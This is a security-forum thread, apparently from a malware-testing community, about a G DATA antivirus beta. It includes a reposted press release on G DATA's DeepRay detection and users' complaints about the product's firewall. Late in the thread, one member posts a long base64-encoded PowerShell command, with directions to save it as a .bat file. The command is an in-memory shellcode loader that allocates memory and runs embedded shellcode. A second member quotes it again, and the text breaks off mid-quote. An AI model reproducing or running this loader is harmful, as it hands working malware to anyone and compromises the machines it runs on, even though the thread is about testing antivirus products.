G DATA Beta-Test 25.5.1.14

Faybert

Faybert

Level 24
Verified
Top Poster
Well-known
Jan 8, 2017
1,320
Mahesh Sudula said:
+1 , however signature wise Avira , next is Eset.
They would never relie on Avira due to local phlegm(Compete), but ESET would be a very good alternative.
Click to expand...
The very engine of G Data is already very good, sometimes much faster in responses to new threats than Bitdefender, with its BB, firewall and now with this new security module (Deepray), they have a very strong protection power, without needing the engine of Bitdefender , but obvious that another engine like Avira, Avast and etc, would be very welcome, the latter was already used by G Data.

I agree on the local issue of Avira, and do not believe that Eset would "share " Your engine, even more for G Data.
 
  • Like
Reactions: Mahesh Sudula, amico81, oldschool and 2 others
Mariihh

Mariihh

Level 3
Verified
Well-known
Mar 30, 2018
139
Faybert said:
DeepRay now officially unveiled by G Data:

DeepRay messes up cybercriminals
With machine learning against malware: G DATA has introduced its latest next-generation technology. DeepRay can effectively detect obfuscation of malware samples, protecting customers in real time from new threats.
G_DATA_DeepRay_PR_Image_72dpi_242d633e10.jpg
G DATA introduces DeepRay.
G DATA is tackling the growing threat posed by cybercrime with a complete new development. Instead of catching malware with classic signatures, the German IT security manufacturer relies on a self-developed machine learning solution to quickly identify, identify and block rapidly changing malware in a timely, effective and resource-efficient manner. The DeepRay technologyclassifies the possible damage files using artificial intelligence on the basis of several hundred factors and calculates a risk value for each individual executable file.
DeepRay has become necessary because the cybercrime scene has developed massively over the past few years: malicious software has become a service good. Criminals can buy specialized malicious software packages on relevant underground platforms and then distribute them. They need far less specialized knowledge than before. As a result, more and more criminals are taking advantage of these offerings, spreading more and more malware online. In addition, the malware itself is also technologically superior. Sophisticated camouflage mechanisms make detection by antivirus software difficult. Classic algorithms for finding such malware are thus severely limited in their effectiveness.
New iteration of Next-Gen technologies
The DeepRay technology complements the already extensive portfolio of next-generation technologies in the G DATA securitysolutions . The Exploit Protection can already prevent the exploitation of security vulnerabilities in the operating system and software, the G DATA BankGuard protects users in online banking. A complete overview of all Next-Gen components can be found in this blog post.
"With DeepRay, we're changing the rules of the game and taking their economic footing for cybercriminals. Thanks to this new technology we are behind the camouflage of the malicious software and can effectively fend off fast-paced malware campaigns. Thus, we significantly improve the protection for our customers, "explains Andreas Lüning, founder and CEO of G DATA Software AG.
DeepRay is based on the more than 30 years of experience that G DATA has in the antivirus business . The expertise in analyzing and classifying malware flows directly into the training of new machine learning components. G DATA uses neural networks with multiple perceptrons to quickly and efficiently classify executables.
All in all, around 20 differently-trained machine-learning models are doing their job in the G DATA security solution in order to ensure optimal detection of defective files using DeepRay. Executable files of various kinds (portable executables such as .exe / MSIL / .Net or VB6) are analyzed based on static indicators predefined by our analysts. The training set includes more than 150 such indicators, including the ratio of file size to executable code, the version of the compiler used, or the number of imported system functions.
20 machine-learning models in the service of customers
Using various training sets, the models analyze the processes and determine a risk value. If the file is considered potentially defective by one of the models, the machine learning technology will initiate a deeper analysis of the file. This analysis takes place in the memory of the customer. As a result, malware can not behave differently in an analytics environment to escape detection. The DeepRay technology therefore makes it possible to detect even previously unknown malware based on specific memory characteristics.
Nor does it use cybercriminals to obfuscate their malicious code with the help of certain packers or other concealment techniques. First of all, even the use of certain packers in combination with other features can reveal an executable file as malicious. And second, the code runs at least in the main memory of the computer in plain text and can be analyzed.
However, as new malware families or new threats emerge, another learning process remains essential. For this DeepRay uses adaptive learning. The knowledge gained from the technology will be much more stable and long-term usable than single signatures or heuristic detection methods.
The advantage of the technology is obvious: it not only detects malware samples previously considered by analysts to be harmful, but also previously unknown programs. In addition, it is no longer necessary to write a separate signature for each individual recognition. With a growing data set and a long-term learning process, DeepRay's insights can effectively protect users from malware in the long run.

Source: DeepRay versaut Cyberkriminellen das Geschäft | G DATA Blog
Click to expand...
At last they have pronounced :)
 
  • Like
Reactions: Faybert
Cortex

Cortex

Level 26
Verified
Top Poster
Well-known
Aug 4, 2016
1,465
Lockdown said:
Good luck with the firewall. It has been reported to G DATA many times.
Click to expand...

Well as everything I did was to no avail so I contacted support who amazingly quickly replied, unfortunately the info they gave me was not even sightly correct, I replied with a screenshot of the firewall exception module & a reply saying 'don't know what to do next'. They thanked me for the feedback and with the shortest email in history suggested I look in advanced settings (been there before).

After much faffing & the cat going upstairs I gave up - I'm not number one with firewalls but not totally useless but IMHO the only way to get it to work was disable the firewall - I think it needs some work? :)
Anyway will give the anti-virus more attention but not internet security.
 
Last edited:
  • Like
Reactions: oldschool
D

Deleted Member 3a5v73x

G Data's Firewall have had and still has bugs, reports are ignored and placed on less priority list to be fixed, so most likely, never. G Data still can be easily penetrated with some malicious visual basic scripts. Going F-secures route with Deepray, naming modules as unicorns and aquamarines. Don't be sheeps..
 
  • Like
Reactions: oldschool
E

Eddie Morra

Mahesh Sudula said:
They would never relie on Avira due to local phlegm(Compete)
Click to expand...
That could be even more of a reason for them to pick Avira. ;)

1. Keep your competitors close and use them to your advantage to help you overtake them.
2. Make your competitors become distracted when they start noticing how legal usage of their technology through an already-made deal which cannot just be dropped out of the blue is making them fall behind a competitor.
3. Stay on track with changes being made by your competitors - what better way is there to do this without insider information than being associated with them on a business level for SDK licensing?

Eliminating point #2 for this fourth point... a healthy relationship between the two could benefit both greatly. It could progress to them sharing intelligence with each other on various things one was doing better than the other, allowing both of them to improve in new areas and make things better for customers. In the end, this leads to the company becoming better overall health all the way to the quality of provided services.

If Avira and G Data worked together, they could accomplish some really neat things. Once you push out the negative thoughts of not wanting to work with X over them being a competitor for the same home country and start looking at the potential benefits, things can become very interesting.
 
  • Like
Reactions: Handsome Recluse and upnorth
Cortex

Cortex

Level 26
Verified
Top Poster
Well-known
Aug 4, 2016
1,465
It was just for fun really, car took in for servicing & spare time, I was interested if I could get the streamer working with g-date - Now imaged back to this morning (4 minutes) so nothing changed & g-data gone in its entirety. But i do like trying software esp as I have nothing to lose.
 
D

davisd

Level 3
Verified
Jan 27, 2019
108
  • Like
  • Wow
Reactions: JB007, harlan4096, amico81 and 4 others
SeriousHoax

SeriousHoax

Level 49
Verified
Top Poster
Well-known
Mar 16, 2019
3,862
  • Like
Reactions: JB007 and Andrew3000
Andrew3000

Andrew3000

Level 11
Verified
Top Poster
Malware Hunter
Well-known
Feb 8, 2016
537
SeriousHoax said:
Any way to attain this sample?
Click to expand...


I think the malicious code is:
(Create a .bat file)
Code: 
powershell -w 3 -C "powershell -ec 'JABTAHMAIAA9ACAAJwAkAEwAeQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAgACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACAAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAIAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABMAHkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAJABiAD0AWwBjAGgAYQByAF0AOQAxACsAWwBjAGgAYQByAF0ANgA2ACsAWwBjAGgAYQByAF0AMQAyADEAKwBbAGMAaABhAHIAXQAxADEANgArAFsAYwBoAGEAcgBdADEAMAAxACsAWwBjAGgAYQByAF0AOQAxACsAWwBjAGgAYQByAF0AOQAzACsAWwBjAGgAYQByAF0AOQAzACsAJwAnACQAegAnACcAOwBpAGUAeAAgACIAJABiACAAPQAgADAAeABiAGUALAAwAHgAMQA3ACwAMAB4AGUAYQAsADAAeAAyAGMALAAwAHgANAA2ACwAMAB4AGQAYgAsADAAeABjAGIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA1AGIALAAwAHgAOAAzACwAMAB4AGUAOAAsADAAeABmAGMALAAwAHgAMwAxACwAMAB4ADcAMAAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADYANwAsADAAeABlADQALAAwAHgAYwBlACwAMAB4AGIAMwAsADAAeAA3AGIALAAwAHgAMQAwACwAMAB4ADgAYwAsADAAeAAzAGMALAAwAHgAOAAzACwAMAB4AGUAMQAsADAAeABmADEALAAwAHgAYgA1ACwAMAB4ADYANgAsADAAeABkADAALAAwAHgAMwAxACwAMAB4AGEAMQAsADAAeABlADMALAAwAHgANAAzACwAMAB4ADgAMgAsADAAeABhADEALAAwAHgAYQAxACwAMAB4ADYAZgAsADAAeAA2ADkALAAwAHgAZQA3ACwAMAB4ADUAMQAsADAAeABmAGIALAAwAHgAMQBmACwAMAB4ADIAMAAsADAAeAA1ADYALAAwAHgANABjACwAMAB4ADkANQAsADAAeAAxADYALAAwAHgANQA5ACwAMAB4ADQAZAAsADAAeAA4ADYALAAwAHgANgBiACwAMAB4AGYAOAAsADAAeABjAGQALAAwAHgAZAA1ACwAMAB4AGIAZgAsADAAeABkAGEALAAwAHgAZQBjACwAMAB4ADEANQAsADAAeABiADIALAAwAHgAMQBiACwAMAB4ADIAOAAsADAAeAA0AGIALAAwAHgAMwBmACwAMAB4ADQAOQAsADAAeABlADEALAAwAHgAMAA3ACwAMAB4ADkAMgAsADAAeAA3AGQALAAwAHgAOAA2ACwAMAB4ADUAMgAsADAAeAAyAGYALAAwAHgAZgA2ACwAMAB4AGQANAAsADAAeAA3ADMALAAwAHgAMwA3ACwAMAB4AGUAYgAsADAAeABhAGQALAAwAHgANwAyACwAMAB4ADEANgAsADAAeABiAGEALAAwAHgAYQA2ACwAMAB4ADIAYwAsADAAeABiADgALAAwAHgAMwBkACwAMAB4ADYAYQAsADAAeAA0ADUALAAwAHgAZgAxACwAMAB4ADIANQAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4ADQAYgAsADAAeABkAGUALAAwAHgANQBiACwAMAB4ADEAZQAsADAAeAA0AGEALAAwAHgAMwA2ACwAMAB4ADkAMgAsADAAeABkAGYALAAwAHgAZQAxACwAMAB4ADcANwAsADAAeAAxAGEALAAwAHgAMQAyACwAMAB4AGYAYgAsADAAeABiADAALAAwAHgAOQBkACwAMAB4AGMAZAAsADAAeAA4AGUALAAwAHgAYwA4ACwAMAB4AGQAZAAsADAAeAA3ADAALAAwAHgAOAA5ACwAMAB4ADAAZgAsADAAeAA5AGYALAAwAHgAYQBlACwAMAB4ADEAYwAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADIANAAsADAAeAA4ADYALAAwAHgANwA3ACwAMAB4AGIAOQAsADAAeABlADkALAAwAHgANQAxACwAMAB4AGYAYwAsADAAeABiADUALAAwAHgANAA2ACwAMAB4ADEANQAsADAAeAA1AGEALAAwAHgAZABhACwAMAB4ADUAOQAsADAAeABmAGEALAAwAHgAZAAxACwAMAB4AGUANgAsADAAeABkADIALAAwAHgAZgBkACwAMAB4ADMANQAsADAAeAA2AGYALAAwAHgAYQAwACwAMAB4AGQAOQAsADAAeAA5ADEALAAwAHgAMgBiACwAMAB4ADcAMgAsADAAeAA0ADMALAAwAHgAOAAwACwAMAB4ADkAMQAsADAAeABkADUALAAwAHgANwBjACwAMAB4AGQAMgAsADAAeAA3ADkALAAwAHgAOAA5ACwAMAB4AGQAOAAsADAAeAA5ADkALAAwAHgAOQA0ACwAMAB4AGQAZQAsADAAeAA1ADAALAAwAHgAYwAwACwAMAB4AGYAMAAsADAAeAA0AGUALAAwAHgAMABlACwAMAB4ADgAZQAsADAAeAAwADAALAAwAHgAZQA3ACwAMAB4AGEANwAsADAAeAAwADcALAAwAHgANgBmACwAMAB4ADkAZQAsADAAeAAxADMALAAwAHgAYgBmACwAMAB4ADIAMwAsADAAeAAxADcALAAwAHgAYgBhACwAMAB4ADMAOAAsADAAeAA0ADMALAAwAHgAMAAyACwAMAB4AGYAMwAsADAAeAA5AGQALAAwAHgAZQA4ACwAMAB4AGYAZQAsADAAeABhADcALAAwAHgANwAyACwAMAB4ADUAYwAsADAAeAA2ADkALAAwAHgANwAyACwAMAB4ADIAMgAsADAAeAAxAGIALAAwAHgAYwBlACwAMAB4ADcAZAAsADAAeAAxAGYALAAwAHgAOAA4ACwAMAB4ADQAMwAsADAAeABlADgALAAwAHgAOQBjACwAMAB4ADcAYwAsADAAeAAzADcALAAwAHgAOAA0ACwAMAB4ADMAMgAsADAAeAA5AGQALAAwAHgAYgA3ACwAMAB4ADUANAAsADAAeABkAGEALAAwAHgAMwBlACwAMAB4AGIANwAsADAAeAA1ADQALAAwAHgAMQBhACwAMAB4ADEAMAAsADAAeAA4ADAALAAwAHgANgBkACwAMAB4ADcANQAsADAAeAAxADcALAAwAHgAYgAyACwAMAB4AGYAZAAsADAAeABkADgALAAwAHgAYQAzACwAMAB4ADcAMwAsADAAeABjAGIALAAwAHgAYgBkACwAMAB4ADQAYQAsADAAeAAzADkALAAwAHgANQBiACwAMAB4ADMAMgAsADAAeABmADcALAAwAHgAOQAzACwAMAB4AGUAYgAsADAAeAA5ADkALAAwAHgANQAxACwAMAB4ADUAZgAsADAAeAA1AGQALAAwAHgAZAAxACwAMAB4ADYAZQAsADAAeAA3ADIALAAwAHgAMwAzACwAMAB4ADUAYQAsADAAeABmADIALAAwAHgAYwAzACwAMAB4AGMAYgAsADAAeAAwAGMALAAwAHgAOQBjACwAMAB4ADgAYwAsADAAeAA0ADIALAAwAHgAMwAzACwAMAB4ADkAYQAsADAAeABjAGMALAAwAHgAOAAwACwAMAB4AGMAMgAsADAAeABlADUALAAwAHgANgAwACwAMAB4ADQAMwAsADAAeABkADQALAAwAHgAZQBiACwAMAB4AGUANgAsADAAeAAxADcALAAwAHgAOAA3ACwAMAB4AGIAOAAsADAAeABiADUALAAwAHgANAAwACwAMAB4ADcANAAsADAAeAA2ADkALAAwAHgANQAyACwAMAB4ADgANAAsADAAeAAyAGYALAAwAHgAYgBiACwAMAB4ADkAOQAsADAAeABhADUALAAwAHgAMQBhACwAMAB4ADUANQAsADAAeABiADcALAAwAHgANQAzACwAMAB4AGYAYgAsADAAeAAwADkALAAwAHgAMQBiACwAMAB4ADMANwAsADAAeAA1ADAALAAwAHgAZgA4ACwAMAB4AGYAMwAsADAAeAA5AGEALAAwAHgANQAwACwAMAB4ADEAYwAsADAAeAA3AGYALAAwAHgAMQBhACwAMAB4ADgAOQAsADAAeAA5ADkALAAwAHgAYgBmACwAMAB4ADkAMQAsADAAeAAyADcALAAwAHgAYwBhACwAMAB4AGIANwAsADAAeAA0ADkALAAwAHgANAA3ACwAMAB4ADAAYQAsADAAeABhADAALAAwAHgAMgA5ACwAMAB4AGIANwAsADAAeAAzAGYALAAwAHgAZAAwACwAMAB4ADQAZAAsADAAeABlADIALAAwAHgAMABmACwAMAB4ADYANQAsADAAeAA1ADMALAAwAHgANgA0ACwAMAB4ADYAMAAsADAAeAAzADAALAAwAHgAMwAxACwAMAB4ADIAMgAsADAAeAA3AGYALAAwAHgAZQBlACwAMAB4ADUAYwAsADAAeAA4AGEALAAwAHgAMQA3ACwAMAB4ADEAMQAsADAAeABiADEALAAwAHgAMABhACwAMAB4AGUAOAAsADAAeAA3ADkALAAwAHgAYgAxACwAMAB4ADAAYQAsADAAeABhADgALAAwAHgANwA5ACwAMAB4AGUAMgAsADAAeAA2ADIALAAwAHgANwAwACwAMAB4AGQAZQAsADAAeAA1ADcALAAwAHgAOQA3ACwAMAB4ADcAZgAsADAAeABjAGIALAAwAHgAYwBiACwAMAB4ADAANAAsADAAeABkADMALAAwAHgANwBkACwAMAB4ADAAYwAsADAAeABmAGQALAAwAHgAYgBiACwAMAB4ADcAZAAsADAAeABmADMALAAwAHgAMAAxACwAMAB4ADMAYwAsADAAeAAyAGQALAAwAHgAYQA1ACwAMAB4ADYAOQAsADAAeAAyAGUALAAwAHgANAA3ACwAMAB4AGMAMAAsADAAeAA4AGIALAAwAHgAYgAxACwAMAB4AGIAMgAsADAAeAA1ADYALAAwAHgAOABiACwAMAB4ADMAYQAsADAAeABmADAALAAwAHgAZAAyACwAMAB4ADAAYwAsADAAeABjADIALAAwAHgAYwA5ACwAMAB4ADYAMAAsADAAeABkADIALAAwAHgAYgAxACwAMAB4ADIAOAAsADAAeAAzADIALAAwAHgAMQAxACwAMAB4ADYANgAsADAAeAA1AGIALAAwAHgAYgBlACwAMAB4ADYAYQAsADAAeAA2ADYALAAwAHgANgA0ACwAMAB4ADcAMAAsADAAeABhADMALAAwAHgAYQBiACwAMAB4AGIANQAsADAAeAA0ADIALAAwAHgAZgBkACwAMAB4AGUANQAsADAAeABmADkALAAwAHgAOABhACwAMAB4ADMAMAAsADAAeABjAGUALAAwAHgAYwBiACwAMAB4AGQAMgAiADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABnAEkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGcASQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAZwBJACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAUwBzACkAKQA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABBAFoAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAQQBaACAALQBlAGMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBjACAAJABlACIAOwB9AA=='"
 
  • Wow
  • Like
Reactions: JB007, SeriousHoax and marcopaone
SeriousHoax

SeriousHoax

Level 49
Verified
Top Poster
Well-known
Mar 16, 2019
3,862
Andrew3000 said:
I think the malicious code is:
(Create a .bat file)
Code: 
powershell -w 3 -C "powershell -ec 'JABTAHMAIAA9ACAAJwAkAEwAeQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAgACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACAAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAIAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABMAHkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAJABiAD0AWwBjAGgAYQByAF0AOQAxACsAWwBjAGgAYQByAF0ANgA2ACsAWwBjAGgAYQByAF0AMQAyADEAKwBbAGMAaABhAHIAXQAxADEANgArAFsAYwBoAGEAcgBdADEAMAAxACsAWwBjAGgAYQByAF0AOQAxACsAWwBjAGgAYQByAF0AOQAzACsAWwBjAGgAYQByAF0AOQAzACsAJwAnACQAegAnACcAOwBpAGUAeAAgACIAJABiACAAPQAgADAAeABiAGUALAAwAHgAMQA3ACwAMAB4AGUAYQAsADAAeAAyAGMALAAwAHgANAA2ACwAMAB4AGQAYgAsADAAeABjAGIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA1AGIALAAwAHgAOAAzACwAMAB4AGUAOAAsADAAeABmAGMALAAwAHgAMwAxACwAMAB4ADcAMAAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADYANwAsADAAeABlADQALAAwAHgAYwBlACwAMAB4AGIAMwAsADAAeAA3AGIALAAwAHgAMQAwACwAMAB4ADgAYwAsADAAeAAzAGMALAAwAHgAOAAzACwAMAB4AGUAMQAsADAAeABmADEALAAwAHgAYgA1ACwAMAB4ADYANgAsADAAeABkADAALAAwAHgAMwAxACwAMAB4AGEAMQAsADAAeABlADMALAAwAHgANAAzACwAMAB4ADgAMgAsADAAeABhADEALAAwAHgAYQAxACwAMAB4ADYAZgAsADAAeAA2ADkALAAwAHgAZQA3ACwAMAB4ADUAMQAsADAAeABmAGIALAAwAHgAMQBmACwAMAB4ADIAMAAsADAAeAA1ADYALAAwAHgANABjACwAMAB4ADkANQAsADAAeAAxADYALAAwAHgANQA5ACwAMAB4ADQAZAAsADAAeAA4ADYALAAwAHgANgBiACwAMAB4AGYAOAAsADAAeABjAGQALAAwAHgAZAA1ACwAMAB4AGIAZgAsADAAeABkAGEALAAwAHgAZQBjACwAMAB4ADEANQAsADAAeABiADIALAAwAHgAMQBiACwAMAB4ADIAOAAsADAAeAA0AGIALAAwAHgAMwBmACwAMAB4ADQAOQAsADAAeABlADEALAAwAHgAMAA3ACwAMAB4ADkAMgAsADAAeAA3AGQALAAwAHgAOAA2ACwAMAB4ADUAMgAsADAAeAAyAGYALAAwAHgAZgA2ACwAMAB4AGQANAAsADAAeAA3ADMALAAwAHgAMwA3ACwAMAB4AGUAYgAsADAAeABhAGQALAAwAHgANwAyACwAMAB4ADEANgAsADAAeABiAGEALAAwAHgAYQA2ACwAMAB4ADIAYwAsADAAeABiADgALAAwAHgAMwBkACwAMAB4ADYAYQAsADAAeAA0ADUALAAwAHgAZgAxACwAMAB4ADIANQAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4ADQAYgAsADAAeABkAGUALAAwAHgANQBiACwAMAB4ADEAZQAsADAAeAA0AGEALAAwAHgAMwA2ACwAMAB4ADkAMgAsADAAeABkAGYALAAwAHgAZQAxACwAMAB4ADcANwAsADAAeAAxAGEALAAwAHgAMQAyACwAMAB4AGYAYgAsADAAeABiADAALAAwAHgAOQBkACwAMAB4AGMAZAAsADAAeAA4AGUALAAwAHgAYwA4ACwAMAB4AGQAZAAsADAAeAA3ADAALAAwAHgAOAA5ACwAMAB4ADAAZgAsADAAeAA5AGYALAAwAHgAYQBlACwAMAB4ADEAYwAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADIANAAsADAAeAA4ADYALAAwAHgANwA3ACwAMAB4AGIAOQAsADAAeABlADkALAAwAHgANQAxACwAMAB4AGYAYwAsADAAeABiADUALAAwAHgANAA2ACwAMAB4ADEANQAsADAAeAA1AGEALAAwAHgAZABhACwAMAB4ADUAOQAsADAAeABmAGEALAAwAHgAZAAxACwAMAB4AGUANgAsADAAeABkADIALAAwAHgAZgBkACwAMAB4ADMANQAsADAAeAA2AGYALAAwAHgAYQAwACwAMAB4AGQAOQAsADAAeAA5ADEALAAwAHgAMgBiACwAMAB4ADcAMgAsADAAeAA0ADMALAAwAHgAOAAwACwAMAB4ADkAMQAsADAAeABkADUALAAwAHgANwBjACwAMAB4AGQAMgAsADAAeAA3ADkALAAwAHgAOAA5ACwAMAB4AGQAOAAsADAAeAA5ADkALAAwAHgAOQA0ACwAMAB4AGQAZQAsADAAeAA1ADAALAAwAHgAYwAwACwAMAB4AGYAMAAsADAAeAA0AGUALAAwAHgAMABlACwAMAB4ADgAZQAsADAAeAAwADAALAAwAHgAZQA3ACwAMAB4AGEANwAsADAAeAAwADcALAAwAHgANgBmACwAMAB4ADkAZQAsADAAeAAxADMALAAwAHgAYgBmACwAMAB4ADIAMwAsADAAeAAxADcALAAwAHgAYgBhACwAMAB4ADMAOAAsADAAeAA0ADMALAAwAHgAMAAyACwAMAB4AGYAMwAsADAAeAA5AGQALAAwAHgAZQA4ACwAMAB4AGYAZQAsADAAeABhADcALAAwAHgANwAyACwAMAB4ADUAYwAsADAAeAA2ADkALAAwAHgANwAyACwAMAB4ADIAMgAsADAAeAAxAGIALAAwAHgAYwBlACwAMAB4ADcAZAAsADAAeAAxAGYALAAwAHgAOAA4ACwAMAB4ADQAMwAsADAAeABlADgALAAwAHgAOQBjACwAMAB4ADcAYwAsADAAeAAzADcALAAwAHgAOAA0ACwAMAB4ADMAMgAsADAAeAA5AGQALAAwAHgAYgA3ACwAMAB4ADUANAAsADAAeABkAGEALAAwAHgAMwBlACwAMAB4AGIANwAsADAAeAA1ADQALAAwAHgAMQBhACwAMAB4ADEAMAAsADAAeAA4ADAALAAwAHgANgBkACwAMAB4ADcANQAsADAAeAAxADcALAAwAHgAYgAyACwAMAB4AGYAZAAsADAAeABkADgALAAwAHgAYQAzACwAMAB4ADcAMwAsADAAeABjAGIALAAwAHgAYgBkACwAMAB4ADQAYQAsA